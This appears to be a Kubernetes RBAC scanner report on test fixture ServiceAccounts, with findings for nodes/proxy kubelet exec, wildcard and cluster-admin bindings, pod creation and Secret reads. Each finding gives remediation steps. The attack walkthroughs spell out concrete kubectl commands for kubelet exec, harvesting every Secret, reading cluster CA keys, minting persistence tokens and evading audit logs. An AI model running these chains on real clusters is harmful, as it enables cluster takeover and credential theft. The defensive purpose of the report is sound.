get nodes/proxy enables kubelet exec via API server (ServiceAccount/rbac-fixtures/sa-nodes-proxy)
Scope · Cluster Cluster-wide kubelet API on every node (nodes is cluster-scoped)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-nodes-proxy Resource: RBACRule/cr-nodes-proxy

Subject ServiceAccount/rbac-fixtures/sa-nodes-proxy can get nodes/proxy via ClusterRoleBinding crb-nodes-proxy → ClusterRole cr-nodes-proxy. Despite the read-only-sounding get verb, this permission lets the holder execute arbitrary commands inside any pod on any node by tunneling through the API server to the kubelet's internal HTTP API: /exec, /run, /attach, /portforward.

The technical root cause: pod exec uses an HTTP-to-WebSocket upgrade. The API server authorizes the upgrade based on the initial GET against the proxy subresource, not against pods/exec. So a subject with get nodes/proxy can issue kubectl get --raw '/api/v1/nodes/<node>/proxy/exec/...' and end up with an interactive shell in any container, even with no pods/exec permission anywhere.

Worse, the resulting commands execute over a direct API-server-to-kubelet WebSocket and are NOT recorded in apiserver audit logs at the objectRef/verb granularity. The audit log shows only the proxy GET. Detection requires node-level eBPF/process monitoring (Falco, Tetragon, KubeArmor), not API-server logs alone. Kubernetes issue #119640 and Stream Security have published proof-of-concept exploits.

Impact Cluster-wide remote code execution: exec into any container on any node via the kubelet API, with execution invisible to standard apiserver audit logs.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Techniquenodes/proxy → kubelet API

The nodes/proxy subresource forwards requests to the kubelet on each node. Combined with kubelet's /exec endpoint and a WebSocket verb mismatch, this becomes a primitive for executing commands inside any pod the kubelet can reach.

  1. Attacker confirms the verb with kubectl auth can-i get nodes/proxy --as=sa-nodes-proxy -A.
  2. They list nodes (kubectl get nodes) and pick a high-value one, typically a control-plane node or any node hosting kube-apiserver/etcd/operator pods.
  3. They issue an exec request via the proxy endpoint, e.g. kubectl get --raw '/api/v1/nodes/<node>/proxy/run/kube-system/<pod>/<container>?cmd=id', or open a WebSocket to /exec.
  4. They land in the target container with that container's privileges (host-mounts, capabilities, ServiceAccount token).
  5. From a control-plane container they read /etc/kubernetes/pki/admin.conf for cluster-admin credentials. The entire chain leaves no pods/exec audit entries.
Remediation
Remove nodes/proxy from this subject; reserve it for the API server itself and a tiny set of trusted operators that document this need.
  1. Remove the rule entirely. Application workloads never need nodes/proxy; Kubernetes documents this as a 'severe escalation hazard' in RBAC Good Practices.
  2. If a monitoring/observability stack genuinely requires it, migrate to the nodes/metrics and nodes/stats subresources, which expose telemetry without the exec endpoints.
  3. Deploy node-level runtime monitoring (Falco, Tetragon, KubeArmor) to detect kubelet /exec, /run, /attach usage at the kernel level.
  4. Verify with kubectl auth can-i get nodes/proxy --as=sa-nodes-proxy -A returning no. Test the high-impact case with kubectl get --raw '/api/v1/nodes/<node>/proxy/run/...' returning 403.
Evidence
ScopeCluster
API groupscore/v1
Resourcesnodes/proxy
nodes/proxy: Direct kubelet access (bypasses API server authz)
Verbsget
Source rolecr-nodes-proxy
Inspect: kubectl get clusterrole cr-nodes-proxy -o yaml
Source bindingcrb-nodes-proxy
Inspect: kubectl get clusterrolebinding crb-nodes-proxy -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "nodes/proxy"
  ],
  "scope": "cluster",
  "source_binding": "crb-nodes-proxy",
  "source_role": "cr-nodes-proxy",
  "verbs": [
    "get"
  ]
}
CRITICAL

Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-cluster-admin

KUBE-PRIVESC-017 2 subjects Score 10.0

Affected subjects (2)

CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Cluster 10.0
Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-cluster-admin
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin Resource: RBACRule/cluster-admin

RBAC rule from ClusterRoleBinding crb-cluster-admin → ClusterRole cluster-admin grants * verbs on * resources in * apiGroups to ServiceAccount/rbac-fixtures/sa-cluster-admin. Cluster-wide: applies to every current and future namespace.

Wildcards are dangerous beyond their current expansion: any resource type added later (CRDs, new core subresources, future verbs) is automatically granted to this subject without anyone reviewing the change. The Kubernetes project explicitly flags this in RBAC Good Practices as an anti-pattern.

In a typical attack, an adversary who reaches a workload bound to this rule has full control: they read every Secret, create privileged pods on any node, bind themselves to additional ClusterRoles, and persist by minting long-lived tokens via the TokenRequest API. There is no further escalation needed. The box is already at the top.

Impact Full control over Cluster-wide: read/write every Secret, RBAC, Pod, Node; equivalent to cluster-admin when cluster-scoped.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueWildcard verbs × wildcard resources

An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

  1. Attacker compromises a workload that resolves to ServiceAccount/rbac-fixtures/sa-cluster-admin (vulnerable container image, supply-chain backdoor, or stolen kubeconfig).
  2. They run kubectl auth can-i '*' '*' --as=sa-cluster-admin -A and confirm wildcard permissions.
  3. They list every Secret in scope (kubectl get secrets -A -o yaml) to harvest cloud-provider credentials, registry pull secrets, and other ServiceAccount tokens.
  4. They create a privileged DaemonSet that mounts the host filesystem and reads /etc/kubernetes/pki/* to steal the cluster CA.
  5. They establish persistence by minting a long-lived token for clusterrole-aggregation-controller via the TokenRequest API, then optionally remove their original binding to evade detection.
Remediation
Replace the wildcard rule with an explicit allowlist of (apiGroups, resources, verbs) limited to what the workload actually calls.
  1. Inventory what ServiceAccount/rbac-fixtures/sa-cluster-admin actually needs. Run kubectl auth can-i --list --as=sa-cluster-admin -A and correlate with audit logs filtered on user.username.
  2. Author a least-privilege Role/ClusterRole listing only those (apiGroups, resources, verbs); drop every wildcard. Prefer namespace-scoped Role+RoleBinding over ClusterRole+ClusterRoleBinding wherever possible.
  3. Apply the new binding, delete the wildcard binding ClusterRoleBinding crb-cluster-admin, and verify with kubectl auth can-i '*' '*' --as=sa-cluster-admin -A returning no.
  4. Add a ValidatingAdmissionPolicy (or Kyverno/OPA Gatekeeper rule) that rejects any future Role/ClusterRole containing * in verbs, resources, or apiGroups.
Evidence
ScopeCluster
API groups*
*: Wildcard: every API group
Resources*
*: Wildcard: every resource
Verbs*
*: Wildcard: every verb (get, list, create, update, delete, …)
Source rolecluster-admin
Inspect: kubectl get clusterrole cluster-admin -o yaml
Source bindingcrb-cluster-admin
Inspect: kubectl get clusterrolebinding crb-cluster-admin -o yaml
Show raw JSON
{
  "api_groups": [
    "*"
  ],
  "namespace": "",
  "resources": [
    "*"
  ],
  "scope": "cluster",
  "source_binding": "crb-cluster-admin",
  "source_role": "cluster-admin",
  "verbs": [
    "*"
  ]
}
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Cluster 10.0
Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-wildcard
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard Resource: RBACRule/cr-wildcard

RBAC rule from ClusterRoleBinding crb-wildcard → ClusterRole cr-wildcard grants * verbs on * resources in * apiGroups to ServiceAccount/rbac-fixtures/sa-wildcard. Cluster-wide: applies to every current and future namespace.

Wildcards are dangerous beyond their current expansion: any resource type added later (CRDs, new core subresources, future verbs) is automatically granted to this subject without anyone reviewing the change. The Kubernetes project explicitly flags this in RBAC Good Practices as an anti-pattern.

In a typical attack, an adversary who reaches a workload bound to this rule has full control: they read every Secret, create privileged pods on any node, bind themselves to additional ClusterRoles, and persist by minting long-lived tokens via the TokenRequest API. There is no further escalation needed. The box is already at the top.

Impact Full control over Cluster-wide: read/write every Secret, RBAC, Pod, Node; equivalent to cluster-admin when cluster-scoped.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueWildcard verbs × wildcard resources

An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

  1. Attacker compromises a workload that resolves to ServiceAccount/rbac-fixtures/sa-wildcard (vulnerable container image, supply-chain backdoor, or stolen kubeconfig).
  2. They run kubectl auth can-i '*' '*' --as=sa-wildcard -A and confirm wildcard permissions.
  3. They list every Secret in scope (kubectl get secrets -A -o yaml) to harvest cloud-provider credentials, registry pull secrets, and other ServiceAccount tokens.
  4. They create a privileged DaemonSet that mounts the host filesystem and reads /etc/kubernetes/pki/* to steal the cluster CA.
  5. They establish persistence by minting a long-lived token for clusterrole-aggregation-controller via the TokenRequest API, then optionally remove their original binding to evade detection.
Remediation
Replace the wildcard rule with an explicit allowlist of (apiGroups, resources, verbs) limited to what the workload actually calls.
  1. Inventory what ServiceAccount/rbac-fixtures/sa-wildcard actually needs. Run kubectl auth can-i --list --as=sa-wildcard -A and correlate with audit logs filtered on user.username.
  2. Author a least-privilege Role/ClusterRole listing only those (apiGroups, resources, verbs); drop every wildcard. Prefer namespace-scoped Role+RoleBinding over ClusterRole+ClusterRoleBinding wherever possible.
  3. Apply the new binding, delete the wildcard binding ClusterRoleBinding crb-wildcard, and verify with kubectl auth can-i '*' '*' --as=sa-wildcard -A returning no.
  4. Add a ValidatingAdmissionPolicy (or Kyverno/OPA Gatekeeper rule) that rejects any future Role/ClusterRole containing * in verbs, resources, or apiGroups.
Evidence
ScopeCluster
API groups*
*: Wildcard: every API group
Resources*
*: Wildcard: every resource
Verbs*
*: Wildcard: every verb (get, list, create, update, delete, …)
Source rolecr-wildcard
Inspect: kubectl get clusterrole cr-wildcard -o yaml
Source bindingcrb-wildcard
Inspect: kubectl get clusterrolebinding crb-wildcard -o yaml
Show raw JSON
{
  "api_groups": [
    "*"
  ],
  "namespace": "",
  "resources": [
    "*"
  ],
  "scope": "cluster",
  "source_binding": "crb-wildcard",
  "source_role": "cr-wildcard",
  "verbs": [
    "*"
  ]
}
CRITICAL

Non-system subject ServiceAccount/rbac-fixtures/sa-cluster-admin directly bound to cluster-admin

KUBE-RBAC-OVERBROAD-001 1 subject Score 10.0
MITRE ATT&CK: T1078T1078.004T1098T1548

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Cluster 10.0
Non-system subject ServiceAccount/rbac-fixtures/sa-cluster-admin directly bound to cluster-admin
Scope · Cluster Cluster-wide cluster-admin (full read/write to every resource in every namespace)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin Resource: RBACRule/cluster-admin

Subject ServiceAccount/rbac-fixtures/sa-cluster-admin is directly bound to the built-in cluster-admin ClusterRole via the ClusterRoleBinding crb-cluster-admin. The cluster-admin ClusterRole grants * on * resources in * apiGroups, which means full read/write to every Kubernetes object: Secrets, RBAC, Nodes, Pods, and CRDs cluster-wide.

Microsoft's Threat Matrix for Kubernetes lists Cluster-admin binding as a top-tier privilege-escalation technique, and CIS Kubernetes Benchmark control 5.1.1 ('Ensure that the cluster-admin role is only used where required') is one of the foundational RBAC hardening checks. Common anti-patterns that produce this finding: kubectl create clusterrolebinding admin-binding --clusterrole=cluster-admin --user=alice@example.com for a developer; Helm charts that ship a default ClusterRoleBinding to cluster-admin; SaaS/operator installers that take the lazy path.

An attacker who compromises ServiceAccount/rbac-fixtures/sa-cluster-admin (stolen kubeconfig, vulnerable container, supply-chain backdoor, or OIDC token replay) immediately holds full cluster control with zero lateral movement required.

Impact Full cluster control: read/write every resource cluster-wide, mint any token, modify any binding, schedule on any node. Equivalent to root on the entire cluster.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueDirect cluster-admin binding

The subject is bound directly to the cluster-admin ClusterRole through a ClusterRoleBinding. No chain is needed; they are already cluster-admin. The only question is whether the subject itself can be compromised.

  1. Attacker compromises ServiceAccount/rbac-fixtures/sa-cluster-admin (stolen kubeconfig, OIDC session hijack, leaked CI credential, or compromised pod mounting the SA token).
  2. They run kubectl auth can-i '*' '*' --all-namespaces and confirm yes.
  3. They harvest all Secrets cluster-wide for cloud-credential pivot.
  4. They establish persistence by minting a 1-year TokenRequest for kube-system/clusterrole-aggregation-controller, or by creating a benign-looking ClusterRoleBinding to a backup identity.
  5. They use cluster-admin to disable audit logging or admission controllers, then move quietly through cloud APIs via IRSA/Workload-Identity-mapped credentials.
Remediation
Replace cluster-admin with a custom least-privilege ClusterRole, or scope the binding to a dedicated short-lived admin group reachable only via JIT/break-glass procedures.
  1. Identify what the subject actually does. Audit logs over a representative window will show real verbs/resources for workloads; ask the team for humans.
  2. Author a custom ClusterRole listing only the (apiGroups, resources, verbs) actually needed. Replace the binding to point at the new ClusterRole. Bias toward namespace-scoped Role + RoleBinding wherever possible.
  3. For genuine emergency-admin needs, move to a break-glass model: a separate cluster-admin-jit group reachable only via approved JIT (AWS SSO, GCP IAP, HashiCorp Boundary) with mandatory MFA, time-boxed expiry, and SIEM alerting.
  4. Add a ValidatingAdmissionPolicy that rejects new ClusterRoleBindings to cluster-admin outside the break-glass group.
  5. Verify: kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects' shows only break-glass principals and system: subjects.
Evidence
ScopeCluster
Source rolecluster-admin
Inspect: kubectl get clusterrole cluster-admin -o yaml
Source bindingcrb-cluster-admin
Inspect: kubectl get clusterrolebinding crb-cluster-admin -o yaml
Show raw JSON
{
  "api_groups": null,
  "namespace": "",
  "resources": null,
  "scope": "cluster",
  "source_binding": "crb-cluster-admin",
  "source_role": "cluster-admin",
  "verbs": null
}
HIGH

Cluster-wide pod creation enables token theft and node takeover

KUBE-PRIVESC-001 3 subjects Score 10.0

Affected subjects (3)

HIGH ServiceAccount/rbac-fixtures/sa-pod-create Cluster 10.0
Cluster-wide pod creation enables token theft and node takeover (ServiceAccount/rbac-fixtures/sa-pod-create)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: RBACRule/cr-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create can create pods via ClusterRoleBinding crb-pod-create → ClusterRole cr-pod-create. Cluster-wide: applies to every current and future namespace.

Under Kubernetes' RBAC model, pod creation is one of the most powerful permissions because the API server does not police the privileges of the pod being created, only the create verb itself. A pod is a request to run code as a ServiceAccount; by choosing spec.serviceAccountName the attacker borrows the identity (and RBAC permissions) of any ServiceAccount in the target namespace, with the token mounted automatically at /var/run/secrets/kubernetes.io/serviceaccount/token.

Beyond identity hopping, a created pod can request hostPath, hostNetwork, hostPID, privileged: true, or SYS_ADMIN. None of those are blocked by RBAC; only Pod Security Admission or a policy engine (Kyverno, Gatekeeper, ValidatingAdmissionPolicy) can stop them. A typical attack mounts / from the host and reads /etc/kubernetes/pki/admin.conf directly.

Impact Run arbitrary code as any ServiceAccount in Cluster-wide (including privileged ones); optionally request privileged/host-mount pods to escape to the underlying node.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniquePod creation → ServiceAccount token theft

Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

This is the single most common privilege-escalation pattern in production Kubernetes.

  1. Attacker enumerates target namespaces with kubectl get sa -A to find privileged ServiceAccounts (e.g. kube-system/clusterrole-aggregation-controller).
  2. They craft a pod manifest with spec.serviceAccountName: <privileged-sa> and any container image they control.
  3. They kubectl apply -f the pod; the kubelet mounts the privileged ServiceAccount's JWT into the container at the well-known path.
  4. They exec into the pod (or have the container phone home), read the token, and replay it against the API server.
  5. Optionally, they instead create a pod with hostPID: true + privileged: true + hostPath of / and break out to the node.
Remediation
Remove direct pod-create rights from non-platform identities; have CI/CD or controllers create workload objects (Deployments) so the controller-manager creates the pod under its own ServiceAccount.
  1. Replace direct create on pods with create/update on deployments (or the appropriate workload controller).
  2. Enforce restricted Pod Security Standard via pod-security.kubernetes.io/enforce=restricted namespace label so privileged/hostPath pods are rejected at admission.
  3. Add a Kyverno/Gatekeeper policy that requires automountServiceAccountToken: false on user-created pods, or pins them to a non-privileged ServiceAccount.
  4. Verify with kubectl auth can-i create pods --as=sa-pod-create -A returning no.
Evidence
ScopeCluster
API groupscore/v1
Resourcespods
pods: Workload primitive: create = run code on the cluster
Verbscreate
create: Create new objects of this resource
Source rolecr-pod-create
Inspect: kubectl get clusterrole cr-pod-create -o yaml
Source bindingcrb-pod-create
Inspect: kubectl get clusterrolebinding crb-pod-create -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "pods"
  ],
  "scope": "cluster",
  "source_binding": "crb-pod-create",
  "source_role": "cr-pod-create",
  "verbs": [
    "create"
  ]
}
HIGH ServiceAccount/vulnerable/privileged-reader Cluster 10.0
Cluster-wide pod creation enables token theft and node takeover (ServiceAccount/vulnerable/privileged-reader)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader Resource: RBACRule/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader can create pods via ClusterRoleBinding privileged-reader → ClusterRole privileged-reader. Cluster-wide: applies to every current and future namespace.

Under Kubernetes' RBAC model, pod creation is one of the most powerful permissions because the API server does not police the privileges of the pod being created, only the create verb itself. A pod is a request to run code as a ServiceAccount; by choosing spec.serviceAccountName the attacker borrows the identity (and RBAC permissions) of any ServiceAccount in the target namespace, with the token mounted automatically at /var/run/secrets/kubernetes.io/serviceaccount/token.

Beyond identity hopping, a created pod can request hostPath, hostNetwork, hostPID, privileged: true, or SYS_ADMIN. None of those are blocked by RBAC; only Pod Security Admission or a policy engine (Kyverno, Gatekeeper, ValidatingAdmissionPolicy) can stop them. A typical attack mounts / from the host and reads /etc/kubernetes/pki/admin.conf directly.

Impact Run arbitrary code as any ServiceAccount in Cluster-wide (including privileged ones); optionally request privileged/host-mount pods to escape to the underlying node.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniquePod creation → ServiceAccount token theft

Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

This is the single most common privilege-escalation pattern in production Kubernetes.

  1. Attacker enumerates target namespaces with kubectl get sa -A to find privileged ServiceAccounts (e.g. kube-system/clusterrole-aggregation-controller).
  2. They craft a pod manifest with spec.serviceAccountName: <privileged-sa> and any container image they control.
  3. They kubectl apply -f the pod; the kubelet mounts the privileged ServiceAccount's JWT into the container at the well-known path.
  4. They exec into the pod (or have the container phone home), read the token, and replay it against the API server.
  5. Optionally, they instead create a pod with hostPID: true + privileged: true + hostPath of / and break out to the node.
Remediation
Remove direct pod-create rights from non-platform identities; have CI/CD or controllers create workload objects (Deployments) so the controller-manager creates the pod under its own ServiceAccount.
  1. Replace direct create on pods with create/update on deployments (or the appropriate workload controller).
  2. Enforce restricted Pod Security Standard via pod-security.kubernetes.io/enforce=restricted namespace label so privileged/hostPath pods are rejected at admission.
  3. Add a Kyverno/Gatekeeper policy that requires automountServiceAccountToken: false on user-created pods, or pins them to a non-privileged ServiceAccount.
  4. Verify with kubectl auth can-i create pods --as=privileged-reader -A returning no.
Evidence
ScopeCluster
API groupscore/v1
Resourcespods
pods: Workload primitive: create = run code on the cluster
Verbscreate
create: Create new objects of this resource
Source roleprivileged-reader
Inspect: kubectl get clusterrole privileged-reader -o yaml
Source bindingprivileged-reader
Inspect: kubectl get clusterrolebinding privileged-reader -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "pods"
  ],
  "scope": "cluster",
  "source_binding": "privileged-reader",
  "source_role": "privileged-reader",
  "verbs": [
    "create"
  ]
}
HIGH ServiceAccount/local-path-storage/local-path-provisioner-service-account Namespace 10.0
Namespace local-path-storage only pod creation enables token theft and node takeover (ServiceAccount/local-path-storage/local-path-provisioner-service-account)
Scope · Namespace Namespace local-path-storage only
Category: Privilege Escalation Subject: ServiceAccount/local-path-storage/local-path-provisioner-service-account Resource: RBACRule/local-path-storage/local-path-provisioner-role

Subject ServiceAccount/local-path-storage/local-path-provisioner-service-account can create pods via RoleBinding local-path-storage/local-path-provisioner-bind → Role local-path-storage/local-path-provisioner-role. Namespace local-path-storage only.

Under Kubernetes' RBAC model, pod creation is one of the most powerful permissions because the API server does not police the privileges of the pod being created, only the create verb itself. A pod is a request to run code as a ServiceAccount; by choosing spec.serviceAccountName the attacker borrows the identity (and RBAC permissions) of any ServiceAccount in the target namespace, with the token mounted automatically at /var/run/secrets/kubernetes.io/serviceaccount/token.

Beyond identity hopping, a created pod can request hostPath, hostNetwork, hostPID, privileged: true, or SYS_ADMIN. None of those are blocked by RBAC; only Pod Security Admission or a policy engine (Kyverno, Gatekeeper, ValidatingAdmissionPolicy) can stop them. A typical attack mounts / from the host and reads /etc/kubernetes/pki/admin.conf directly.

Impact Run arbitrary code as any ServiceAccount in Namespace local-path-storage only (including privileged ones); optionally request privileged/host-mount pods to escape to the underlying node.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniquePod creation → ServiceAccount token theft

Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

This is the single most common privilege-escalation pattern in production Kubernetes.

  1. Attacker enumerates target namespaces with kubectl get sa -A to find privileged ServiceAccounts (e.g. kube-system/clusterrole-aggregation-controller).
  2. They craft a pod manifest with spec.serviceAccountName: <privileged-sa> and any container image they control.
  3. They kubectl apply -f the pod; the kubelet mounts the privileged ServiceAccount's JWT into the container at the well-known path.
  4. They exec into the pod (or have the container phone home), read the token, and replay it against the API server.
  5. Optionally, they instead create a pod with hostPID: true + privileged: true + hostPath of / and break out to the node.
Remediation
Remove direct pod-create rights from non-platform identities; have CI/CD or controllers create workload objects (Deployments) so the controller-manager creates the pod under its own ServiceAccount.
  1. Replace direct create on pods with create/update on deployments (or the appropriate workload controller).
  2. Enforce restricted Pod Security Standard via pod-security.kubernetes.io/enforce=restricted namespace label so privileged/hostPath pods are rejected at admission.
  3. Add a Kyverno/Gatekeeper policy that requires automountServiceAccountToken: false on user-created pods, or pins them to a non-privileged ServiceAccount.
  4. Verify with kubectl auth can-i create pods --as=local-path-provisioner-service-account -n local-path-storage returning no.
Evidence
ScopeNamespace
Namespacelocal-path-storage
API groupscore/v1
Resourcespods
pods: Workload primitive: create = run code on the cluster
Verbsgetlistwatchcreatepatchupdatedelete
create: Create new objects of this resource
patch: Mutate existing objects in place
update: Replace existing objects
delete: Permanently remove objects
Source rolelocal-path-provisioner-role
Inspect: kubectl get role local-path-provisioner-role -n local-path-storage -o yaml
Source bindinglocal-path-provisioner-bind
Inspect: kubectl get rolebinding local-path-provisioner-bind -n local-path-storage -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "local-path-storage",
  "resources": [
    "pods"
  ],
  "scope": "namespace",
  "source_binding": "local-path-provisioner-bind",
  "source_role": "local-path-provisioner-role",
  "verbs": [
    "get",
    "list",
    "watch",
    "create",
    "patch",
    "update",
    "delete"
  ]
}
HIGH

Cluster-wide read access to Secrets on ServiceAccount/vulnerable/privileged-reader

KUBE-PRIVESC-005 1 subject Score 10.0
MITRE ATT&CK: T1552.007T1528T1078.004

Affected subject

HIGH ServiceAccount/vulnerable/privileged-reader Cluster 10.0
Cluster-wide read access to Secrets on ServiceAccount/vulnerable/privileged-reader
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Data Exfiltration Subject: ServiceAccount/vulnerable/privileged-reader Resource: RBACRule/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader can get, list, or watch core secrets via ClusterRoleBinding privileged-reader → ClusterRole privileged-reader. Cluster-wide: applies to every current and future namespace.

The Kubernetes documentation is explicit that list and watch reveal Secret contents in the response body (they are not metadata-only verbs), so all three verbs leak the same data.

Kubernetes Secrets typically hold ServiceAccount tokens, kubeconfigs, image-pull credentials, TLS private keys, database passwords, and integration secrets for cloud APIs. Once Secret contents are exposed, the holder can authenticate as the corresponding ServiceAccount/user, which usually amplifies the original blast radius far beyond 'read access'. Cluster-wide reads include kube-system ServiceAccount tokens, which are routinely cluster-admin-equivalent.

Impact Cluster-wide read of every Secret (ServiceAccount tokens, TLS keys, registry credentials, integration secrets), enabling identity replay and cross-namespace lateral movement.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueSecrets read access

get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

  1. Attacker reaches ServiceAccount/vulnerable/privileged-reader (compromised pod, leaked kubeconfig, or stolen token).
  2. They run kubectl get secrets -o yaml in scope and base64-decode every data field.
  3. They identify Secrets of type kubernetes.io/service-account-token (legacy) or call the TokenRequest API with harvested credentials.
  4. They replay the highest-privileged token against the API server (kubectl --token=<jwt> get clusterrolebindings).
  5. They pivot to cloud APIs using extracted IRSA / Workload Identity / cloud-provider credentials, or persist by writing a backdoor into a privileged Deployment.
Remediation
Remove get/list/watch on secrets from this subject; if a specific Secret is genuinely needed, scope by resourceNames to that one name.
  1. Confirm the workload genuinely needs API-time Secret access. Most apps consume Secrets via volume/env injection at pod start and don't need RBAC read.
  2. If runtime access is required, scope the rule by resourceNames to the exact Secret(s) the workload reads. Never leave it as 'all secrets'. Drop list and watch; keep only get.
  3. Move the binding from cluster-wide to namespace-scoped (RoleBinding instead of ClusterRoleBinding) so the blast radius is bounded.
  4. Verify with kubectl auth can-i list secrets --as=privileged-reader -A returning no.
  5. For sensitive Secrets (TLS keys, cloud credentials), consider an external secret store (Vault, AWS/GCP Secrets Manager via CSI driver) and enable encryption-at-rest with a KMS-backed EncryptionConfiguration.
Evidence
ScopeCluster
API groupscore/v1
Resourcessecrets
secrets: Holds credentials, tokens, TLS keys
Verbsgetlist
Source roleprivileged-reader
Inspect: kubectl get clusterrole privileged-reader -o yaml
Source bindingprivileged-reader
Inspect: kubectl get clusterrolebinding privileged-reader -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "secrets"
  ],
  "scope": "cluster",
  "source_binding": "privileged-reader",
  "source_role": "privileged-reader",
  "verbs": [
    "get",
    "list"
  ]
}
HIGH

Cluster-wide create serviceaccounts/token enables token minting

KUBE-PRIVESC-014 1 subject Score 10.0
